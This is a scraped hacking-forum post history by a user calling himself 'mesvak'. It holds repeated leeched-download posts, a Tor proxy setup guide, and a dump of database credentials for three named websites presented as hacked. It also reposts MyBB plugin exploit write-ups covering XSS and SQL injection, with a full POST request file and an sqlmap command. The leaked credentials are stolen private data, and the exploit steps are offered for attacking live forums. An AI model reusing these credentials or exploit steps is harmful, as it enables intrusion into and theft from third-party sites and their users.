mesvak

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] https://mega.nz/#F!qiYiUa4K!aCn1t5uDGw6_XaSS10j6DA [/hide] ENJOI UR ASS LILS Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] 1- first of all you needa dl the program that i provided for ya below JDEV FOR NETWORK tHEN INSTALL IT PRESS NEXT NEXT NEXT ,.... TILL ITS DONE 2-OPEN CHROME AND GO TO THIS SITE https://chrome.google.com/webstore/detail/falcon-proxy/gchhimlnjdafdlkojbffdkogjhhkdepf/related?hl=EN https://pasteboard.co/I5hck6P.png 3- install falcon proxy as you can see above 4- then move on to falcon proxy and click on it , click create a new one and fill it like this type>>sock5 Ip>> 127.0.0.1 port>>9050 rest of em dont matter https://pasteboard.co/I5hdauR.png 5-then press create and activate this bullshit like this https://pasteboard.co/I5he7Qq.png 6-now the fucking theory is done now lets test go to this site while proxy falcon is online https://dnsleaktest.com/ Then press extended one not standard wait till u get all the results if u are doing right u needa get to many ip adress like this https://pasteboard.co/I5hf0Bf.png this means u are done and you can go to onion shits like this one zial32pytl.onion or...... [/hide] PROGRAM: [hide] JDEV TOR NETWORK : LINK [/hide] [/url] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] [ DATABASE ] http://www.3wbc.org.au [-]Database Name = wbcorgau_wp [-]Database User = wbcorgau_wpuser Database Password = 1sr0*CVPWLB8m4S68XjW [-]Database Host = localhost [ DATABASE ] http://paneepace.it [-]Database Name = ewkeqoli_pane_2018 [-]Database User = ewkeqoli_pane_2018 Database Password = pane_2018 [-]Database Host = localhost [ DATABASE ] http://www.llardana.com [-]Database Name = db1376399_llardana [-]Database User = u1376399_user Database Password = L4laRf45Lojx5XXDFrrf5gG [-]Database Host = mysql508int.srv-acens.com [/hide] enjoI Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] hacked and fucked site THIS IS LIE TO BE ME SECOND PART [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD MY iNStagram Id : mesvak

PLS READ WATEVER INSIDE THE CODE SECTION ''No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account.'' and THE SHITTY THING IS Y OU CAN EVEN INSTALL WATEVER MYBB VERSION U WANT AND EVEN CREATE HOST AND BE ABLE TO TAKE THE DB ON THAT SHIT PLS READ THAN TALK :kappa:

[hide] # Exploit Title: MyBB Thank Like Plugin 3.0.0 - XSS # Date: 10/3/2018 # Author: Mesvak # Version: 3.0.0 # Tested on: KALI # CVE: CVE-2018-14888 1. Description: This plugin allows users to thank/like other users threads/posts. In user profiles it shows your most liked post/thread, the post/thread subjects aren't sanitized to user input. 2. Proof of Concept: - Use the following as the post/thread subject - Get that post/thread liked by another user (or you) - Visit your profile to see alert. [/hide] soLUTION IS UPDATING TO NEW VERSION OF ASS Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] # Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting # Date: 4/20/2018 # Author: Mesvak # Version: 1.1 # Tested on: Ubuntu 17.10 1. Description: Adds a new section to user profiles that will display their last posts. 2. Proof of Concept: Persistent XSS - Create a thread with the following subject - Now visit your profile to see the alert. [/hide] SOLUTION [hide] $d['tsubject'] = htmlspecialchars_uni($d['tsubject']); [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] # Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS # Date: 3/15/2018 # Author: 0xB9 # Version: v1.3 # Tested on: Ubuntu 17.10 1. Description: When editing a thread the user is given to the option to convert the thread to a link. 2. Proof of Concept: Persistent XSS - Edit a thread or post you've made - At the bottom of the edit page in the Thread Link box input the following "> - Now visit the forum your thread/post exists in to see the alert. [/hide] SOLUTION [hide] Patch in line 83: $thread['tlink'] = ($thread['tlink']); to $thread['tlink'] = htmlspecialchars_uni($thread['tlink']); [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] # Exploit Title: MyBB Downloads 2.3 - SQL Injection # Date: 28-10-2018 # Exploit Author: MEsvak lil ass # Contact: instagram.com/mesvak # Version: 2.0.3 # Tested on: Ubuntu 18.04 1. Description: It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval. 2. Proof of Concept: Persistent XSS - Go to downloads.php page - Create a New Download - Add the following to the title: a" - Now on submit, the user will be prompted to an SQL Injection specific error. ``` MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1 Query: SELECT * FROM mybb_downloads WHERE name="a"" ``` - THis can be exploited with: sqlmap -r request_file -p name --threads 5 3. Request File example: POST /downloads.php?newdownload=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8081/downloads.php?newdownload=1 Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160 Content-Length: 1029 Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="my_post_key" 6cb47e578ed16aa5272c55b0cb8745b4 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="name" a" -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="shortdesc" test -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="description" test -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="image" -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="url" 1 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="numimages" 4 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="submit" Publish download -----------------------------171894060312075061251712806160-- [/hide] this is the plugin that must be on the mybb site to be injected by shitty ass exploit link Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] Exploit Title: XSS in MyBB up to 1.8.13 via installer # Date: Found on 05-29-2017 # Exploit Author: Mesvak # Version: Version > 1.8.13 No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account. The vulnerability occurs in /install/index.php:2503 and occurs because there is no html encoding of the $error. A simple way to exploit this is to create an error by using the Database Server Hostname and inserting HTML characters there. It is a POST XSS and this is a PoC: Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server. A simple fix would be to change the function error_list($array) to: function error_list($array) { $string = "</pre> <ul>\n"; foreach($array as $error) { $string .= ""; $string .= htmlspecialchars($error); $string .= ""; } $string .= "</ul>\n";<br>return $string [/hide] WELP as far as ik they already fixed this Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

[hide] LINJK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils